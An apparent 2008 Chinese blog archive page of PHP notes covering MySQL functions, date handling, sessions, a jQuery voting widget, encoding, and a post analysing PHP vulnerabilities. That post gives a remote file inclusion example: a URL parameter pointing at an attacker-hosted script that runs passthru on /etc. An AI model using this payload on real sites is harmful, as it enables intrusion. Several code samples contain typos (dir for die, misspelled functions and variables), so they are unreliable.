走过平凡人生、留下平凡足迹 注册 | 登陆
浏览模式: 标准 | 列表2008年04月的文章

PHP与MYSQL交互函数表学习笔记

说 明 函 数 说 明
建立数据库连接 mysql_connect() resource mysql_connect([string hostname [:port] [:/path/to/socket] [, string username] [, string password]])
示例:$conn = @mysql_connect("localhost", "username", "password") or dir("不能连接到Mysql Server");
使用该连接必须显示的关闭连接
建立数据库连接 mysql_pconnect() resource mysql_pconnect([string hostname [:port] [:/path/to/socket] [, string username] [, string password]])
示例:$conn = @mysql_pconnect("localhost", "username", "password") or dir("不能连接到Mysql Server");
使用该连接函数不需要显示的关闭连接,它相当于使用了连接池
关闭数据库连接 mysql_close() $conn = @mysql_connect("localhost", "username", "password") or die("不能连接到Mysql Server");
@mysql_select_db("MyDatabase") or die("
不能选择这个数据库,或数据库不存在");
echo "
你已经连接到MyDatabase数据库
";
mysql_close();
 
选择数据库 mysql_select_db() boolean mysql_select_db(string db_name [, resource link_id])
$conn = @mysql_connect("localhost", "username", "password") or die("
不能连接到Mysql Server");
@mysql_select_db("MyDatabase") or die("
不能选择这个数据库,或数据库不存在");
 
查询MySQL mysql_query() resource mysql_query (string query, [resource link_id])
$linkId = @mysql_connect("localhost", "username", "password") or die("
不能连接到Mysql Server");
@mysql_select_db("MyDatabase") or die("
不能选择这个数据库,或者数据库不存在");
$query = "select * from MyTable";
$result = mysql_query($query);
mysql_close();
SQL查询执行成功,则返回资源标识符,失败时返回FALSE。若执行更新成功,则返回TRUE,否则返回FALSE
查询MySQL mysql_db_query() resource mysql_db_query(string database, string query [, resource link_id])
$linkId = @mysql_connect("localhost", "username", "password") or die("
不能连接到MysqlServer");
$query = "select * from MyTable";
$result = mysql_db_query("MyDatabase", $query);
mysql_close();
为了使代码清晰,不推荐使用这个函数调用
获取和显示数据 mysql_result() mixed mysql_result (resource result_set, int row [, mixed field])
$query = "select id, name from MyTable order by name";
$result = mysql_query($query);
$c_id = mysql_result($result, 0, "id");
$c_name = mysql_result($result, 0, "name");
最简单、也是效率最低的数据获取函数
获取和显示数据 mysql_fetch_row() array mysql_fetch_row (resource result_set)
$query = "select id, name from MyTable order by name";
$result = mysql_query($query);
while (list($id, $name) = mysql_fetch_row($result)) {
        echo("Name: $name ($id) <br />");
}
函数从result_set中获取整个数据行,将值放在一个索引数组中。通常会结使list()函数使用
获取和显示数据 mysql_fetch_array() array mysql_fetch_array (resource result_set [, int result_type])
$query = "select id, name from MyTable order by name";
$result = mysql_query($query);
while($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
        $id = $row["id"];
        $name = $row["name"];
        echo "Name: $name ($id) <br />";
}
result_type的值有:
MYSQL_ASSOC:
字段名表示键,字段内容为值
MYSQL_NUM: 数值索引数组,操作与mysql_fetch_ros()
函数一样
MYSQL_BOTH: 即作为关联数组又作为数值索引数组返回。result_type的默认值。
获取和显示数据 mysql_fetch_assoc() array mysql_fetch_assoc (resource result_set)
相当于调用 mysql_fetch_array(resource, MYSQL_ASSOC);
 
获取和显示数据 mysql_fetch_object() object mysql_fetch_object(resource result_set)
$query = "select id, name from MyTable order by name";
while ($row = mysql_fetch_object($result)) {
        $id = $row->id;
        $name = $row->name;
        echo "Name: $name ($id) <br />";
}
在操作上与mysql_fetch_array()相同
所选择的记录 mysql_num_rows() int mysql_num_rows(resource result_set)
#query = "select id, name from MyTable where id > 65";
$result = mysql_query($query);
echo "
".mysql_num_rows($result)."条记录的ID大于65";
只在确定select查询所获取的记录数时才有用。
受影响的记录 mysql_affected_rows() int mysql_affected_rows([resource link_id])
$query = "update MyTable set name='CheneyFu' where id>=5";
$result = mysql_query($query);
echo "ID
大于等于5的名称被更新了的记录数:".mysql_affected_rows();
该函数获取受INSERT,UPDATEDELETE更新语句影响的行数
获取数据库列表信息 mysql_list_dbs() resource mysql_list_dbs([resource link_id])
mysql_connect("localhost", "username", "password");
$dbs = mysql_list_dbs();
echo "Databases: <br />";
while (list($db) = mysql_fetch_rows($dbs)) {
        echo "$db <br />";
}
 
获取数据库名 mysql_db_name() string mysql_db_name(resource result_set, integer index) 该函数获取在mysql_list_dbs()所返回result_set中位于指定index索引的数据库名
获取数据库表列表 mysql_list_tables() resource mysql_list_tables(string database [, resource link_id])
mysql_connect("localhost", "username", "password");
$tables = mysql_list_tables("MyDatabase");
while (list($table) = mysql_fetch_row($tables)) {
        echo "$table <br />";
}
该函数获取database中所有表的表名
获取数据库表名 mysql_tablename() string mysql_tablename(resource result_set, integer index)
mysql_connect("localhost", "username", "password");
$tables = mysql_list_tables("MyDatabase");
$count = -1;
while (++$count < mysql_numrows($tables)) {
        echo mysql_tablename($tables, $count)."<br />";
}
该函数获取mysql_list_tables()所返回result_set中位于指定index索引的表名
获取字段信息 mysql_fetch_field() object mysql_fetch_field(resource result [, int field_offset])
mysql_connect("localhost", "username", "password");
mysql_select_db("MyDatabase");
$query = "select * from MyTable";
$result = mysql_query($query);
$fields = mysql_num_fields($result);
for($count = 0; $count < $fieds; $count++) {
       $field = mysql_fetch_field($result, $count);
       echo "<p>$field->name  $field->type  ($field->max_length) </p>";
}
返回的对象共有12个对象属性:
name:
字段名
table:
字段所在的表
max_length:
字段的最大长度
not_null: 如果字段不能为null,则为1,否则
0
primary_key:
如果字段为主键,则为1,否则
0
unique_key:
如果字段是唯一键,则为1 否则
0
multiple_key:
如果字段为非唯一,则为1,否则
0
numeric:
如果字段为数值则为1,否则
0
blob:
如果字段为BLOB则为1,否则为
0
type:
字段的数据类型
unsigned: 如果字段为无符号数则为1,否则为
0
zerofill:
如果字段为“零填充”则为1 否则为0
获取查询的字段数 mysql_num_fields() integer mysql_num_fields (resource result_set)
$query = "select id, name from MyTable order by name";
$result = mysql_query($query);
echo "
这个查询的字段数是:".mysql_num_fields($result)."<br />";
返回查询result_set中的字段数
获取指定表的所有字段的字段名 mysql_list_fields() resource mysql_list_fields (string database_name, string table_name [, resource link_id])
$fields = mysql_list_fields("MyDatabase", "MyTable");
echo "
数据库MyDatabase中表MyTable的字段数: ".mysql_num_fields($fields)."<br />";
 
获取指定的字段选项 mysql_field_flags() string mysql_field_flags (resource result_set, integer field_offset)  
获取指定的字段的最大长度 mysql_field_len() integer mysql_field_len (resource result_set, integer field_offset)
$query = "select name from MyTable";
$result = mysql_query($query);
$row = mysql_fetch_row($result);
echo mysql_field_len($result, 0)."<br />";
如果mysql_field_len($reseult, 0) = 16777215
那么numer_format(mysql_field_len($result))等于16,777,215
获取字段名 mysql_field_name() string mysql_field_name (resource result_set, int field_offset)
$query = "select id as PKID, name from MyTable order by name";
$result = mysql_query($query);
$row = mysql_fetch_row($result);
echo mysql_field_name($result, 0); // Result: PKID
 
获取字段类型 mysql_field_type() string mysql_field_type (resource result_set, int field_offset)
$query = "select id, name from MyTable order by name";
$result = mysql_query($query);
$row = mysql_fetch_row($result);
echo mysql_field_type($result, 0); // Result: int
 
获取字段所在表名 mysql_field_table() string mysql_field_table (resource result_set, int field_offset)
$query = "select id as PKID, name from MyTable order by name";
$result = mysql_query($query);
$row = mysql_fetch_row($result);
echo mysql_field_table($result, 0); 

Tags: php mysql

php中计算时间差的几种方法

php中计算时间差有时候是件麻烦的事!不过只要你掌握了日期时间函数的用法那这些也就变的简单了:  
一个简单的例子就是计算借书的天数,这需要php根据每天的日期进行计算,下面就来谈谈实现这种日期计算的几种方法:
(1) 如果有数据库就很容易了!若是MSSQL可以使用触发器!用专门计算日期差的函数datediff()便可!  
  若是MYSQL那就用两个日期字段的差值计算的计算结果保存在另一个数值型字段中!用时调用便可!
(2)如果没有数据库,那就得完全用php的时间日期函数!下面主要说明之:  
  例:计算1998年5月3日到1999-6-5的天数:   

PHP代码
  1. <? php   
  2.   
  3. $startdate = mktime("0","0","0","5","3","1998");    
  4.    $enddate = mktime("0","0","0","6","5","1999");    
  5.    //所得到的值为从1970-1-1到参数时间的总秒数:是整数.那么     
  6.   
  7.   
  8.    //下面的代码就好编多了:    
  9.   $days=round(($enddate-$startdate)/3600/24) ;    
  10.   echo $days;    
  11.   //days为得到的天数;    
  12.   
  13. ?>   
  14.   

  若mktime()中的参数缺省,那表示使用当前日期,这样便可计算从借书日期至今的天数.    
  可别忘了到期还书哟!过期可是要罚款的!! @_@

Tags: php, 时差

PHP5中新增加的日期(date)函数的常量

PHP 5.1.1 起定义有以下常量来提供标准日期表达方法,可以用于日期格式函数(例如 date())。

  DATE_ATOM(string)

  原子钟格式(如:2005-08-15T15:52:01+00:00)

  DATE_COOKIE(string)

例:echo date(DATE_COOKIE);输出:

Wednesday, 09-Apr-08 09:57:57 UTC

  HTTP Cookies 格式

例:echo date("HTTP Cookies");输出

09UTCUTC+00:00 C20082008k59UTC50

  DATE_ISO8601(string)

  ISO-8601(如:2005-08-15T15:52:01+0000)

  DATE_RFC822(string)

  RFC 822(如:Mon, 15 Aug 2005 15:52:01 UTC)

  DATE_RFC850(string)

  RFC 850(如:Monday, 15-Aug-05 15:52:01 UTC)

  DATE_RFC1036(string)

  RFC 1036(如:Monday, 15-Aug-05 15:52:01 UTC)

  DATE_RFC1123(string)

  RFC 1123(如:Mon, 15 Aug 2005 15:52:01 UTC)

  DATE_RFC2822(string)

  RFC 2822(如:Mon, 15 Aug 2005 15:52:01 +0000)

  DATE_RSS(string)

  RSS(如:Mon, 15 Aug 2005 15:52:01 UTC)

  DATE_W3C(string)

  World Wide Web Consortium(如:2005-08-15T15:52:01+00:00)

  比如,要输出一个RSS需要的日期格式,就可以用下面的代码简单实现:

  echo date(DATE_RSS);

Tags: php, 日期, 常量

清明三天假期

清明的三天假期转眼就过去了,三天假期大家都是怎么过的呢?

反正我过的是最简单不过了,宿舍,宿舍,还是宿舍!!!

本来星期天和同事打算去长城玩玩的,但是因为后来由于同事生病了,最后也没去成。

或许是变懒了,又或许是自己实在是有点中年的感觉了,老感觉自己现在越来越不喜欢运动了。

sablog加入jquery顶一下功能修改笔记

加入文章顶或踩功能 修改原程序文件

1.加入jquery.js到include目录
2.修改模版文件show.php:

引入jquery.js
<script type="text/javascript" src="include/jquery.js"></script>

行引入ding.js
<script type="text/javascript" src="include/ding.js"></script>

适当位置加入
    <div class="digbox">
        <div class="dig" id="showding">$d</div>
        <div class="digaction" id="digding"><a href="###">顶一下</a></div>
    </div>

3.修改数据库表articles
增加ding字段 varchar(10),默认值为0|0(原设计为顶或踩两个功能)

4.增加CSS样式

.digbox{
width:52px;
height:80px;
float:right;

}
.dig{
    width:52px;
    height:52px;
    background:url(img/dig.gif) repeat-y;
    font-size: 20px;
    color:#FFFFFF;
    line-height: 52px;
    text-align: center;
    clear: both;

}
.digaction{
    width:52px;
    height:20px;
    font-size: 12px;
    margin-top:5px;
    border: 1px solid #DEEAF7;
    text-align: center;
    line-height: 20px;
    color:white;
    background:url(img/btn_normal.gif);
    font-weight:bold;
}
.digaction a:link{
color:white;
text-decoration:none
}

.digaction a:hover{
color:black;
text-decoration:none;
border: 1px solid #ADCAEC;
display:block

}

» 阅读全文

Tags: jquery php

PHP会话(Session)使用

对比起 Cookie,Session 是存储在服务器端的会话,相对安全,并且不像 Cookie 那样有存储长度限制,本文简单介绍 Session 的使用。

  由于 Session 是以文本文件形式存储在服务器端的,所以不怕客户端修改 Session 内容。实际上在服务器端的 Session 文件,PHP 自动修改 Session 文件的权限,只保留了系统读和写权限,而且不能通过 ftp 修改,所以安全得多。

  对于 Cookie 来说,假设我们要验证用户是否登陆,就必须在 Cookie 中保存用户名和密码(可能是 md5 加密后字符串),并在每次请求页面的时候进行验证。如果用户名和密码存储在数据库,每次都要执行一次数据库查询,给数据库造成多余的负担。因为我们并不能只做一次验证。为什么呢?因为客户端 Cookie 中的信息是有可能被修改的。假如你存储 $admin 变量来表示用户是否登陆,$admin 为 true 的时候表示登陆,为 false 的时候表示未登录,在第一次通过验证后将 $admin 等于 true 存储在 Cookie,下次就不用验证了,这样对么?错了,假如有人伪造一个值为 true 的 $admin 变量那不是就立即取的了管理权限么?非常的不安全。

  而 Session 就不同了,Session 是存储在服务器端的,远程用户没办法修改 Session 文件的内容,因此我们可以单纯存储一个 $admin 变量来判断是否登陆,首次验证通过后设置 $admin 值为 true,以后判断该值是否为 true,假如不是,转入登陆界面,这样就可以减少很多数据库操作了。而且可以减少每次为了验证 Cookie 而传递密码的不安全性了(Session 验证只需要传递一次,假如你没有使用 SSL 安全协议的话)。即使密码进行了 md5 加密,也是很容易被截获的。

  当然使用 Session 还有很多优点,比如控制容易,可以按照用户自定义存储等(存储于数据库)。我这里就不多说了。

  Session 在 php.ini 是否需要设置呢?一般不需要的,因为并不是每个人都有修改 php.ini 的权限,默认 Session 的存放路径是服务器的系统临时文件夹,我们可以自定义存放在自己的文件夹里,这个稍后我会介绍。

  开始介绍如何创建 Session。非常简单,真的。

  启动 Session 会话,并创建一个 $admin 变量:

» 阅读全文

Tags: php session

常见php页面漏洞分析及相关问题解决

从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.
  
  我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
  
  首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码:
    include($include."/xxx.php");
  ?>
  在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在b.php中写入类似于:passthru("/bin/ls /etc");的代码.这样,就可以执行一些有目的的攻击了.(注:web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看<<如何对PHP程序中的常见漏洞进行攻击>>).在这个漏洞方面,出状况的很多,比方说:PayPal Store Front,
  HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.

» 阅读全文

Tags: php

PHP 开发中的中文编码问题

PHP程序设计中中文编码问题曾经困扰很多人,导致这个问题的原因其实很简单,每个国家(或区域)都规定了计算机信息交换用的字符编码集,如美国的扩展 ASCII 码, 中国的 GB2312-80,日本的 JIS 等。作为该国家/区域内信息处理的基础,字符编码集起着统一编码的重要作用。字符编码集按长度分为 SBCS(单字节字符集),DBCS(双字节字符集)两大类。早期的软件(尤其是操作系统),为了解决本地字符信息的计算机处理,出现了各种本地化版本(L10N),为了区分,引进了 LANG, Codepage 等概念。但是由于各个本地字符集代码范围重叠,相互间信息交换困难;软件各个本地化版本独立维护成本较高。因此有必要将本地化工作中的共性抽取出来,作一致处理,将特别的本地化处理内容降低到最少。这也就是所谓的国际化(118N)。各种语言信息被进一步规范为 Locale 信息。处理的底层字符集变成了几乎包含了所有字形的 Unicode。

  现在大部分具有国际化特征的软件核心字符处理都是以 Unicode 为基础的,在软件运行时根据当时的ocale/Lang/Codepage 设置确定相应的本地字符编码设置,并依此处理本地字符。在处理过程中需要实现 Unicode 和本地字符集的相互转换,甚或以 Unicode 为中间的两个不同本地字符集的相互转换。这种方式在网络环境下被进一步延伸,任何网络两端的字符信息也需要根据字符集的设置转换成可接受的内容。

  数据库中的字符集编码问题

  流行的关系数据库系统都支持数据库字符集编码,也就是说在创建数据库时可以指定它自己的字符集设置,数据库的数据以指定的编码形式存储。当应用程序访问数据时,在入口和出口处都会有字符集编码的转换。对于中文数据,数据库字符编码的设置应当保证数据的完整性。GB2312、GBK、UTF-8 等都是可选的数据库字符集编码;当然我们也可以选择 ISO8859-1 (8-bit),只是我们得在应

» 阅读全文

Tags: php, 编码

Records:3412345